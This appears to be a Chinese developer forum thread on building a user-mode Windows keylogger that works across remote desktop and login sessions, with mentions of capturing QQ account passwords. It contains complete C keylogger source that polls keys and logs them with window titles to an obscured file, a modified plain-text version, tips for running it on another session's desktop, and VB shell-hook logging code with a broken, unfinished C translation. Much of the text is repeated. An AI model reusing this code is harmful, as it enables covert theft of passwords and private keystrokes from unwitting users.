在远程桌面的那个桌面中运行你的程序安装钩子 这个不现实,远程桌面肯定是没有权限安装钩子的 raw input 当输入字符很快的时候就获取不到了还有你给的代码是ring0下的 我只要ring3下面的 不要使用驱动 xiaopoy的代码在远程登录界面是记录不到的
这段代码谁翻译成C啊 翻译了就结贴给分,谢谢了 Attribute VB_Name = "Module1" Option ExplicitPrivate Declare Function RegisterShellHook Lib "Shell32" Alias "#181" (ByVal hwnd As Long, ByVal nAction As Long) As Long 'use in 98 Private Declare Function RegisterShellHookWindow Lib "user32" (ByVal hwnd As Long) As Long 'use in NT5 Private Declare Function RegisterWindowMessage Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String) As Long Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long 'Powered by barenx 'Private Const HSHELL_WINDOWCREATED = 1 ' 系统级的窗体被创建 'Private Const HSHELL_WINDOWDESTROYED = 2 ' 系统级的窗体即将被关闭 'Private Const HSHELL_ACTIVATESHELLWINDOW = 3 ' SHELL 的主窗体将被激活(本例未用) 'Private Const HSHELL_WINDOWACTIVATED = 4 ' 系统级的窗体被激活 'Private Const HSHELL_GETMINRECT = 5 ' 窗体被最大化或最小化(本例未用) 'Private Const HSHELL_REDRAW = 6 ' Windows 任务栏被刷新(本例未用) 'Private Const HSHELL_TASKMAN = 7 ' 任务列表的内容被选中(本例未用) 'Private Const HSHELL_LANGUAGE = 8 ' 中英文切换或输入法切换(本例未用) 'MSDN 'wParam lParam 'HSHELL_GETMINRECT A pointer to a SHELLHOOKINFO structure. 'HSHELL_WINDOWACTIVATEED The HWND handle of the activated window. 'HSHELL_RUDEAPPACTIVATEED The HWND handle of the activated window. 'HSHELL_WINDOWREPLACING The HWND handle of the window replacing the top-level window. 'HSHELL_WINDOWREPLACED The HWND handle of the window being replaced. 'HSHELL_WINDOWCREATED The HWND handle of the window being created. 'HSHELL_WINDOWDESTROYED The HWND handle of the top-level window being destroyed. 'HSHELL_ACTIVATESHELLWINDOW Not used. 'HSHELL_TASKMAN Can be ignored. 'HSHELL_REDRAW The HWND handle of the window that needs to be redrawn. 'HSHELL_FLASH The HWND handle of the window that needs to be flashed. 'HSHELL_ENDTASK The HWND handle of the window that should be forced to exit. 'HSHELL_APPCOMMAND The APPCOMMAND which has been unhandled by the application or other hooks. See WM_APPCOMMAND and use the message cracker GET_APPCOMMAND_LPARAM(lParam) to crack this parameter. Private Const HSHELL_WINDOWCREATED = 1 Private Const HSHELL_WINDOWDESTROYED = 2 Private Const HSHELL_ACTIVATESHELLWINDOW = 3 Private Const HSHELL_WINDOWACTIVATED = 4 Private Const HSHELL_GETMINRECT = 5 Private Const HSHELL_REDRAW = 6 Private Const HSHELL_TASKMAN = 7 Private Const HSHELL_LANGUAGE = 8 Private Const HSHELL_SYSMENU = 9 Private Const HSHELL_ENDTASK = 10 Private Const HSHELL_ACCESSIBILITYSTATE = 11 Private Const HSHELL_APPCOMMAND = 12 Private Const HSHELL_WINDOWREPLACED = 13 Private Const HSHELL_WINDOWREPLACING = 14 Private Const HSHELL_HIGHBIT = &H8000 Private Const HSHELL_FLASH = (HSHELL_REDRAW Or HSHELL_HIGHBIT) Private Const HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED Or HSHELL_HIGHBIT) Private Const GWL_WNDPROC = -4 ' 该索引用来创建窗口类的子类 Private Shell_Hook_Msg_ID As Long Private LogWinOldProc As Long Private LogControl As Control Public Enum mLogControlType tListBox tTextBox tForm tPictureBox tLabel End Enum Private LogControlType As mLogControlType Public Function RegLogWindow(ByVal hwnd As Long, ByVal mLogControl As Control, ByVal tLogControlType As mLogControlType) As Boolean On Error Resume Next LogControlType = tLogControlType Dim tmp As Long Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK") RegLogWindow = Shell_Hook_Msg_ID RegLogWindow = RegLogWindow And (RegisterShellHook(hwnd, 1) Or RegisterShellHookWindow(hwnd)) ' 调用未公开的函数(进行注册) LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, AddressOf WindowProc) ' 实施拦截:在存储了原入口地址的同时,将新地址指向自定义的函数WindowProc 'LogControl = mLogControl Set LogControl = mLogControl End FunctionPublic Function UnRegLogWindow(hwnd As Long) Call RegisterShellHook(hwnd, 0) Call SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc) End FunctionPrivate Function WindowProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long ' 回调函数 Dim i As Long Dim m_Out_String As String Dim recTime As String Dim recParam As String If uMsg = Shell_Hook_Msg_ID Then recTime = Format$(Now(), "YY-MM-DD:HH-NN-SS ") & vbTab & " 0x" & _ Hex$(wParam) & vbTab & " 0x" & _ Hex$(lParam) & vbTab & " " Select Case wParam Case HSHELL_WINDOWCREATED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWCREATED" & vbTab & " " & m_Out_String Case HSHELL_WINDOWDESTROYED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWDESTROYED" & vbTab & " " & m_Out_String Case HSHELL_ACTIVATESHELLWINDOW m_Out_String = recTime & "HSHELL_ACTIVATESHELLWINDOW" Case HSHELL_WINDOWACTIVATED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWACTIVATEED" & vbTab & " " & m_Out_String Case HSHELL_GETMINRECT m_Out_String = recTime & "HSHELL_GETMINRECT" Case HSHELL_REDRAW m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_REDRAW" & vbTab & " " & m_Out_String Case HSHELL_TASKMAN m_Out_String = recTime & "HSHELL_TASKMAN" Case HSHELL_LANGUAGE m_Out_String = recTime & "HSHELL_LANGUAGE" Case HSHELL_SYSMENU m_Out_String = recTime & "HSHELL_SYSMENU" Case HSHELL_ENDTASK m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_ENDTASK" & vbTab & " " & m_Out_String Case HSHELL_ACCESSIBILITYSTATE m_Out_String = recTime & "HSHELL_ACCESSIBILITYSTATE" Case HSHELL_APPCOMMAND m_Out_String = recTime & "HSHELL_APPCOMMAND" Case HSHELL_WINDOWREPLACED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWREPLACED" & vbTab & " " & m_Out_String Case HSHELL_WINDOWREPLACING m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWREPLACING" & vbTab & " " & m_Out_String Case HSHELL_FLASH m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_FLASH" & vbTab & " " & m_Out_String Case HSHELL_RUDEAPPACTIVATED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_RUDEAPPACTIVATEED" & vbTab & " " & m_Out_String End Select If Len(m_Out_String) Then Call m_WriteToControl(m_Out_String) Else WindowProc = CallWindowProc(LogWinOldProc, hwnd, uMsg, wParam, lParam) End If End Function Private Function m_WriteToControl(t_str As String) Select Case LogControlType Case tListBox LogControl.AddItem t_str Case tTextBox LogControl.Text = LogControl.Text & vbCrLf & t_str Case tForm, tPictureBox LogControl.Print t_str Case tLabel LogControl.Caption = t_str End Select End Function
注册下输入设备 再在过程函数里面处理WM_INPUT消息就OK了 话说09年还是10年就看到有网友说QQ游戏的帐号、密码可以获取 没想到2011了还是没有改善
接收QQ登录框的输入消息时倒是有消息干扰 不过驱动级别还是能够获取
http://www.socool-soft.com/post/25.html
__beginthread ( KeyLogger);//
即可。
代码可以复制到编辑器里,然后就可以看好格式了。
void SaveToFile(CHAR *lpBuffer)
{ CHAR strRecordFile[MAX_PATH];
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, "\\keylog.dat");
HANDLE hFile = CreateFile(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
DWORD dwSize = GetFileSize(hFile, NULL);
if (dwSize < 1024 * 1024 * 500)
SetFilePointer(hFile, 0, 0, FILE_END);
// 加密
int nLength = lstrlen(lpBuffer);
LPBYTE lpEncodeBuffer = new BYTE[nLength];
for (int i = 0; i < nLength; i++)
lpEncodeBuffer[i] = lpBuffer[i] ^ 98;
WriteFile(hFile, lpEncodeBuffer, lstrlen(lpBuffer), &dwBytesWrite, NULL);
CloseHandle(hFile);
return ;
}
char *LowerCase[]={
"[BACKSPACE]",// "b",
"[Enter]",// "e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"`",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"0",
"-",
"=",
"[TAB]",
"q",
"w",
"e",
"r",
"t",
"y",
"u",
"i",
"o",
"p",
"[",
"]",
"a",
"s",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
";",
"'",
"z",
"x",
"c",
"v",
"b",
"n",
"m",
",",
".",
"/",
"\\",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
// "[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
// "[PageUp]",
"[Del]",
"[End]",
// "[PageDown]",
"[Left]",
"[UP]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",};char *UpperCase[]={
"[BACKSPACE]",// "b",
"[Enter]",// "e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"~",
"!",
"@",
"#",
"$",
"%",
"^",
"&",
"*",
"(",
")",
"_",
"+",
"[TAB]",
"Q",
"W",
"E",
"R",
"T",
"Y",
"U",
"I",
"O",
"P",
"{",
"}",
"A",
"S",
"D",
"F",
"G",
"H",
"J",
"K",
"L",
":",
"\"",
"Z",
"X",
"C",
"V",
"B",
"N",
"M",
"<",
">",
"?",
"│",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
// "[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
// "[PageUp]",
"[Del]",
"[End]",
// "[PageDown]",
"[Left]",
"[Up]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",};int SpecialKeys[]={
8,
13,
27,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
192,
49,
50,
51,
52,
53,
54,
55,
56,
57,
48,
189,
187,
9,
81,
87,
69,
82,
84,
89,
85,
73,
79,
80,
219,
221,
65,
83,
68,
70,
71,
72,
74,
75,
76,
186,
222,
90,
88,
67,
86,
66,
78,
77,
188,
190,
191,
220,
17,
91,
32,
92,
// 44,
145,
45,
36,
// 33,
46,
35,
// 34,
37,
38,
39,
40,
144,
111,
106,
109,
107,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
110,
};HWND PreviousFocus=NULL;
CHAR WindowCaption[1024]={0};
HWND hFocus = NULL;
BOOL IsWindowsFocusChange()
{
// memset(hFocus,0,sizeof(hFocus));
memset(WindowCaption,0,sizeof(WindowCaption));
hFocus = GetForegroundWindow();
GetWindowText(hFocus,WindowCaption,sizeof(WindowCaption));
BOOL ReturnFlag = FALSE;
CHAR temp[1024]={0};
if (hFocus == PreviousFocus)
{ }
else
{
if (lstrlen(WindowCaption) > 0)
{
SYSTEMTIME s;
GetLocalTime(&s);
wsprintf(temp,"\r\n[标题:] %s\r\n[时间:]%d-%d-%d %d:%d:%d\r\n",WindowCaption,s.wYear,s.wMonth,s.wDay,s.wHour,s.wMinute,s.wSecond);
SaveToFile(temp);
memset(temp,0,sizeof(temp));
memset(WindowCaption,0,sizeof(WindowCaption));
ReturnFlag=TRUE;
}
PreviousFocus = hFocus;
}
return ReturnFlag;
}DWORD WINAPI KeyLogger(LPARAM lparam)
{
int bKstate[256] = {0};
int i,x;
CHAR KeyBuffer[600];
int state;
int shift;
memset(KeyBuffer,0,sizeof(KeyBuffer));
while(TRUE)
{
Sleep(8);
if (lstrlen(KeyBuffer) != 0)
{
if (IsWindowsFocusChange())
{
// lstrcat(KeyBuffer,"\r\n");
lstrcat(KeyBuffer,"\n");
SaveToFile("[内容:]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}
else
{ lstrcat(KeyBuffer,"\n");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer)); }
}
for(i=0;i<92;i++)
{
shift = GetKeyState(VK_SHIFT);
x = SpecialKeys[ i ];
if (GetAsyncKeyState(x) & 0x8000)
{
if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1;
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2;
}
else
if (shift < 0)
{
bKstate[x] = 3;
}
else
bKstate[x] = 4;
}
else
{
if (bKstate[x] != 0)
{
state = bKstate[x];
bKstate[x] = 0;
if (x == 8)
{
/* KeyBuffer[lstrlen(KeyBuffer) - 1] = 0;
continue;*///记录退格键
lstrcat(KeyBuffer,"[BACKSPACE]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
if (lstrlen(KeyBuffer) > 550)
{
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
if (x == 13)
{
/*if (lstrlen(KeyBuffer) == 0)
{
continue;
}*///不去掉的话 Enter无法记录
lstrcat(KeyBuffer,"<Enter>\r\n");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
{
if ((state%2) == 1)
{
lstrcat(KeyBuffer,(CHAR *)UpperCase[ i ]);
}
else
if ((state%2) == 0)
{
lstrcat(KeyBuffer,(CHAR *)LowerCase[ i ]);
}
}
}
}
}
}
return 0;
}
http://blog.csdn.net/qq752923276/archive/2011/05/01/6382355.aspx
这个不现实,远程桌面肯定是没有权限安装钩子的
raw input 当输入字符很快的时候就获取不到了还有你给的代码是ring0下的 我只要ring3下面的 不要使用驱动
xiaopoy的代码在远程登录界面是记录不到的
Attribute VB_Name = "Module1"
Option ExplicitPrivate Declare Function RegisterShellHook Lib "Shell32" Alias "#181" (ByVal hwnd As Long, ByVal nAction As Long) As Long 'use in 98
Private Declare Function RegisterShellHookWindow Lib "user32" (ByVal hwnd As Long) As Long 'use in NT5
Private Declare Function RegisterWindowMessage Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
'Powered by barenx
'Private Const HSHELL_WINDOWCREATED = 1 ' 系统级的窗体被创建
'Private Const HSHELL_WINDOWDESTROYED = 2 ' 系统级的窗体即将被关闭
'Private Const HSHELL_ACTIVATESHELLWINDOW = 3 ' SHELL 的主窗体将被激活(本例未用)
'Private Const HSHELL_WINDOWACTIVATED = 4 ' 系统级的窗体被激活
'Private Const HSHELL_GETMINRECT = 5 ' 窗体被最大化或最小化(本例未用)
'Private Const HSHELL_REDRAW = 6 ' Windows 任务栏被刷新(本例未用)
'Private Const HSHELL_TASKMAN = 7 ' 任务列表的内容被选中(本例未用)
'Private Const HSHELL_LANGUAGE = 8 ' 中英文切换或输入法切换(本例未用)
'MSDN
'wParam lParam
'HSHELL_GETMINRECT A pointer to a SHELLHOOKINFO structure.
'HSHELL_WINDOWACTIVATEED The HWND handle of the activated window.
'HSHELL_RUDEAPPACTIVATEED The HWND handle of the activated window.
'HSHELL_WINDOWREPLACING The HWND handle of the window replacing the top-level window.
'HSHELL_WINDOWREPLACED The HWND handle of the window being replaced.
'HSHELL_WINDOWCREATED The HWND handle of the window being created.
'HSHELL_WINDOWDESTROYED The HWND handle of the top-level window being destroyed.
'HSHELL_ACTIVATESHELLWINDOW Not used.
'HSHELL_TASKMAN Can be ignored.
'HSHELL_REDRAW The HWND handle of the window that needs to be redrawn.
'HSHELL_FLASH The HWND handle of the window that needs to be flashed.
'HSHELL_ENDTASK The HWND handle of the window that should be forced to exit.
'HSHELL_APPCOMMAND The APPCOMMAND which has been unhandled by the application or other hooks. See WM_APPCOMMAND and use the message cracker GET_APPCOMMAND_LPARAM(lParam) to crack this parameter.
Private Const HSHELL_WINDOWCREATED = 1
Private Const HSHELL_WINDOWDESTROYED = 2
Private Const HSHELL_ACTIVATESHELLWINDOW = 3
Private Const HSHELL_WINDOWACTIVATED = 4
Private Const HSHELL_GETMINRECT = 5
Private Const HSHELL_REDRAW = 6
Private Const HSHELL_TASKMAN = 7
Private Const HSHELL_LANGUAGE = 8
Private Const HSHELL_SYSMENU = 9
Private Const HSHELL_ENDTASK = 10
Private Const HSHELL_ACCESSIBILITYSTATE = 11
Private Const HSHELL_APPCOMMAND = 12
Private Const HSHELL_WINDOWREPLACED = 13
Private Const HSHELL_WINDOWREPLACING = 14
Private Const HSHELL_HIGHBIT = &H8000
Private Const HSHELL_FLASH = (HSHELL_REDRAW Or HSHELL_HIGHBIT)
Private Const HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED Or HSHELL_HIGHBIT)
Private Const GWL_WNDPROC = -4 ' 该索引用来创建窗口类的子类
Private Shell_Hook_Msg_ID As Long
Private LogWinOldProc As Long
Private LogControl As Control
Public Enum mLogControlType
tListBox
tTextBox
tForm
tPictureBox
tLabel
End Enum
Private LogControlType As mLogControlType
Public Function RegLogWindow(ByVal hwnd As Long, ByVal mLogControl As Control, ByVal tLogControlType As mLogControlType) As Boolean
On Error Resume Next
LogControlType = tLogControlType
Dim tmp As Long
Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK")
RegLogWindow = Shell_Hook_Msg_ID
RegLogWindow = RegLogWindow And (RegisterShellHook(hwnd, 1) Or RegisterShellHookWindow(hwnd)) ' 调用未公开的函数(进行注册)
LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, AddressOf WindowProc) ' 实施拦截:在存储了原入口地址的同时,将新地址指向自定义的函数WindowProc
'LogControl = mLogControl
Set LogControl = mLogControl
End FunctionPublic Function UnRegLogWindow(hwnd As Long)
Call RegisterShellHook(hwnd, 0)
Call SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc)
End FunctionPrivate Function WindowProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long ' 回调函数
Dim i As Long
Dim m_Out_String As String
Dim recTime As String
Dim recParam As String
If uMsg = Shell_Hook_Msg_ID Then
recTime = Format$(Now(), "YY-MM-DD:HH-NN-SS ") & vbTab & " 0x" & _
Hex$(wParam) & vbTab & " 0x" & _
Hex$(lParam) & vbTab & " "
Select Case wParam
Case HSHELL_WINDOWCREATED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWCREATED" & vbTab & " " & m_Out_String
Case HSHELL_WINDOWDESTROYED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWDESTROYED" & vbTab & " " & m_Out_String
Case HSHELL_ACTIVATESHELLWINDOW
m_Out_String = recTime & "HSHELL_ACTIVATESHELLWINDOW"
Case HSHELL_WINDOWACTIVATED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWACTIVATEED" & vbTab & " " & m_Out_String
Case HSHELL_GETMINRECT
m_Out_String = recTime & "HSHELL_GETMINRECT"
Case HSHELL_REDRAW
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_REDRAW" & vbTab & " " & m_Out_String
Case HSHELL_TASKMAN
m_Out_String = recTime & "HSHELL_TASKMAN"
Case HSHELL_LANGUAGE
m_Out_String = recTime & "HSHELL_LANGUAGE"
Case HSHELL_SYSMENU
m_Out_String = recTime & "HSHELL_SYSMENU"
Case HSHELL_ENDTASK
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_ENDTASK" & vbTab & " " & m_Out_String
Case HSHELL_ACCESSIBILITYSTATE
m_Out_String = recTime & "HSHELL_ACCESSIBILITYSTATE"
Case HSHELL_APPCOMMAND
m_Out_String = recTime & "HSHELL_APPCOMMAND"
Case HSHELL_WINDOWREPLACED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWREPLACED" & vbTab & " " & m_Out_String
Case HSHELL_WINDOWREPLACING
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWREPLACING" & vbTab & " " & m_Out_String
Case HSHELL_FLASH
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_FLASH" & vbTab & " " & m_Out_String
Case HSHELL_RUDEAPPACTIVATED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_RUDEAPPACTIVATEED" & vbTab & " " & m_Out_String
End Select
If Len(m_Out_String) Then Call m_WriteToControl(m_Out_String)
Else
WindowProc = CallWindowProc(LogWinOldProc, hwnd, uMsg, wParam, lParam)
End If
End Function
Private Function m_WriteToControl(t_str As String)
Select Case LogControlType
Case tListBox
LogControl.AddItem t_str
Case tTextBox
LogControl.Text = LogControl.Text & vbCrLf & t_str
Case tForm, tPictureBox
LogControl.Print t_str
Case tLabel
LogControl.Caption = t_str
End Select
End Function
所以我不大确定LZ在回复前有测试一下,这个只是死循环来判断按键是否有按下以截取的,不需要注入之类的可能被拦截的流程,所以很方便。
但是想截取登陆时账号密码的话,你确定用键盘记录而不用inline hook来截取?你可以这样改来试一下:
SaveToFile改成void SaveToFile(CHAR *lpBuffer)
{
CHAR strRecordFile[MAX_PATH]= "c:\\";
lstrcatA(strRecordFile, "\\keylog.txt");
HANDLE hFile = CreateFileA(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
DWORD dwSize = GetFileSize(hFile, NULL);
if (dwSize < 1024 * 1024 * 500)
SetFilePointer(hFile, 0, 0, FILE_END);
int nLength = lstrlenA(lpBuffer); WriteFile(hFile, lpBuffer, lstrlenA(lpBuffer), &dwBytesWrite, NULL);
CloseHandle(hFile);
return ;
}
有三行是简单处理那个记录文件的,注释掉使它以明码保存。保存到C:\keylog.txt下。然后保存字节的地方,改成windows方式的换行,我个人的不喜欢那样每个字节都换一下行,所以也注释掉了:
if (IsWindowsFocusChange())
{ lstrcatA(KeyBuffer,"\r\n");
SaveToFile("[内容:]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}
else
{ SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}但诚如Lactoferrin所说,这种方式比较低效。加分的话,那段VB我来翻译。 /:^]
但lactoferrin说的终归是一个问题,要是想记录另外的session里的键盘,得进到和它同一个桌面里才行。 /:^] CreateProcess ();中的LPSTARTUPINFO lpStartupInfo可以设置进程要被创建在桌面。
也可以用
HWINSTA OpenWindowStation(
LPTSTR lpszWinSta, // name of the window station to open
BOOL fInherit, // specifies whether returned handle is inheritable
DWORD dwDesiredAccess // specifies access of returned handle
);
配合
BOOL SetProcessWindowStation(
HWINSTA hWinSta // handle of window station to assign to this process
);
来设置桌面。我把这个翻译了过来,有点原因,这个是作业题 :P。
但没有查错,因为C++里没有那些控件什么的,流程可以用了:#include <windows.h>typedef LONG WINAPI (* RegisterShellHookProcPtr) (HWND hwnd, LONG nAction);RegisterShellHookProcPtr RegisterShellHook= GetProcAddress ( LoadLibraryA ( "Shell32.dll"), reinterpret_cast<LPSTR>(181));const unsigned int HSHELL_WINDOWCREATED = 1;
const unsigned int HSHELL_WINDOWDESTROYED = 2;
const unsigned int HSHELL_ACTIVATESHELLWINDOW = 3;
const unsigned int HSHELL_WINDOWACTIVATED = 4;
const unsigned int HSHELL_GETMINRECT = 5;
const unsigned int HSHELL_REDRAW = 6;
const unsigned int HSHELL_TASKMAN = 7;
const unsigned int HSHELL_LANGUAGE = 8;
const unsigned int HSHELL_SYSMENU = 9;
const unsigned int HSHELL_ENDTASK = 10;
const unsigned int HSHELL_ACCESSIBILITYSTATE = 11;
const unsigned int HSHELL_APPCOMMAND = 12;
const unsigned int HSHELL_WINDOWREPLACED = 13;
const unsigned int HSHELL_WINDOWREPLACING = 14;
const unsigned int HSHELL_HIGHBIT = 0x8000;
const unsigned int HSHELL_FLASH = (HSHELL_REDRAW | HSHELL_HIGHBIT);
const unsigned int HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED | HSHELL_HIGHBIT);
const unsigned int GWL_WNDPROC = -4;// ' 该索引用来创建窗口类的子类
LONG Shell_Hook_Msg_ID;
LONG LogWinOldProc;
Control LogControl;
enum mLogControlType
{
tListBox,
tTextBox,
tForm,
tPictureBox,
tLabel
};
mLogControlType LogControlType;extern long WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
void UnRegLogWindow (HWND hwnd);
BOOL RegLogWindow(HWND hwnd, Control mLogControl, mLogControlType tLogControlType)
{
__try
{
LogControlType = tLogControlType;
LONG temp;
Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK");
RegLogWindow = Shell_Hook_Msg_ID;
RegLogWindow = RegisterShellHook(hwnd, 1);
RegLogWindow= RegisterShellHookWindow(hwnd); // ' 调用未公开的函数(进行注册)
LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, WindowProc); // ' 实施拦截:在存储了原入口地址的同时,将新地址指向自定义的函数WindowProc
